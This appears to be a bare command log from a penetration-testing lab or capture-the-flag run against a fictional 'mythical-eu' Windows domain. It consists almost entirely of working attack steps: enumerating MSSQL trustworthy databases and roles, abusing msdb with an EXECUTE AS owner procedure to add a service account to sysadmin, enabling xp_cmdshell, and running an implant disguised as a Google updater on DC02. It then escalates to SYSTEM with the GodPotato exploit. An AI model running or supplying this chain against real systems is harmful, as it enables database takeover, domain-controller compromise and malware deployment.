mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -Q "SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q "SELECT rp.name as database_role, mp.name as database_user from sys.database_role_members drm join sys.database_principals rp on (drm.role_principal_id = rp.principal_id) join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)"


mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q  "CREATE OR ALTER PROCEDURE dbo.z3r0 WITH EXECUTE AS owner AS ALTER SERVER ROLE sysadmin ADD MEMBER [MYTHICAL-EU\svc_sql];"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q  "EXEC dbo.z3r0;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q  "EXEC sp_configure 'show advanced options', 1; Reconfigure;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q  "EXEC sp_configure 'xp_cmdshell', 1; Reconfigure;"
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q  "EXEC xp_cmdshell 'whoami'"

Initial foothold on DC02

mythical > cp c:\ProgramData\Google\Update.exe \\DC02.mythical-eu.vl\dev\update.exe
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -d msdb -Q  "EXEC xp_cmdshell 'C:\dev\update.exe'"

Privilege escalation on DC02 via SeImpersonatePrivilege

mythical > cp c:\Temp\GodPotato-NET4.exe \\DC02.mythical-eu.vl\dev\GodPotato-NET4.exe
mythical > shell GodPotato-NET4.exe -cmd c:\dev\update.exe